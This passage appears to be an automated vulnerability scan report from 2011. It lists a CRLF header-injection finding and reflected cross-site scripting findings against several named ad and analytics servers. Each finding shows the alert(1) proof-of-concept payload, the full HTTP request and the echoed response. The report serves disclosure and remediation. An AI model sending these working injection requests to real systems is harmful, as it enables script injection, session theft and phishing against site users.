The value of REST URL parameter 1 is copied into the Location response header. The payload 2c8a0%0d%0a598aa37f06f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c8a0%0d%0a598aa37f06f/mtv.mtvi/btf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-expand%7C!category-float%7Cnode-survey%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=927227632701397000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2c8a0
598aa37f06f
/mtv.mtvi/btf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;d:
Date: Tue, 14 Jun 2011 00:18:06 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)
There are 74 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f1d"-alert(1)-"349fca594e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=&e3f1d"-alert(1)-"349fca594e1=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6563
Date: Tue, 14 Jun 2011 00:17:24 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=&e3f1d"-alert(1)-"349fca594e1=1http%3a%2f%2fwww.teleflora.com/%3Fsrccode%3Dme_msnret_bt_ev11_ros_728x90%26promotioncode%3Dmeed15");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dca
...[SNIP]...

3.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac46f"-alert(1)-"b4f7ed4dde6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=ac46f"-alert(1)-"b4f7ed4dde6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6509
Date: Tue, 14 Jun 2011 00:16:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
bureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=ac46f"-alert(1)-"b4f7ed4dde6http://www.teleflora.com/?srccode=me_msnret_bt_ev11_ros_728x90&promotioncode=meed15");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.3. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [;s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The value of the ;s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54b9f"style%3d"x%3aexpression(alert(1))"10025daa06f was submitted in the ;s parameter. This input was echoed as 54b9f"style="x:expression(alert(1))"10025daa06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;ord=4904490449044904;54b9f"style%3d"x%3aexpression(alert(1))"10025daa06f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 552
Date: Tue, 14 Jun 2011 00:14:08 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/h;215935200;4-0;0;15527176;29332-377/140;38766070/38783827/1;;~okv=;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;54b9f"style="x:expression(alert(1))"10025daa06f;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttp://sales-jobs.fins.com/?reflink=djm_bcu_sales_x140">
...[SNIP]...

3.4. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22602"style%3d"x%3aexpression(alert(1))"b75c91509da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22602"style="x:expression(alert(1))"b75c91509da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;ord=4904490449044904;&22602"style%3d"x%3aexpression(alert(1))"b75c91509da=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 522
Date: Tue, 14 Jun 2011 00:15:03 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/u;215935200;5-0;0;15527176;29332-377/140;37749806/37767658/1;;~okv=;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;&22602"style="x:expression(alert(1))"b75c91509da=1;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttp://www.wsjwine.com/2861003">
...[SNIP]...

3.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f96e5</script><script>alert(1)</script>74733bd38c5 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*f96e5</script><script>alert(1)</script>74733bd38c5 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
uhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*f96e5</script><script>alert(1)</script>74733bd38c5">
...[SNIP]...

3.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f733d</script><script>alert(1)</script>8a02258715a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*&f733d</script><script>alert(1)</script>8a02258715a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
hbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*&f733d</script><script>alert(1)</script>8a02258715a=1">
...[SNIP]...

3.7. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 5638e<script>alert(1)</script>c0fe4a3a74d was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData5638e<script>alert(1)</script>c0fe4a3a74d&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 14 Jun 2011 00:14:23 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=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;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 552
Connection: keep-alive

dj.module.ad.bio.loadBizoData5638e<script>alert(1)</script>c0fe4a3a74d({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...

3.8. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload baefe<script>alert(1)</script>f74b73704e0 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvunbaefe<script>alert(1)</script>f74b73704e0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:14:59 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvunbaefe<script>alert(1)</script>f74b73704e0)

3.9. http://ar.voicefive.com/b/node_rcAll.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 98602<script>alert(1)</script>d7cd6ea1cb was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run98602<script>alert(1)</script>d7cd6ea1cb&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:44 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:44 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1556

COMSCORE.BMX.Buddy.run98602<script>alert(1)</script>d7cd6ea1cb({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32
...[SNIP]...

3.10. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 33f79<script>alert(1)</script>0582dfaaac5 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=233f79<script>alert(1)</script>0582dfaaac5&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:48 GMT
Date: Mon, 13 Jun 2011 17:45:48 GMT
Content-Length: 1245
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"233f79<script>alert(1)</script>0582dfaaac5", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



3.11. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload ed9b7<script>alert(1)</script>76715acdffe was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=&c15=ed9b7<script>alert(1)</script>76715acdffe HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
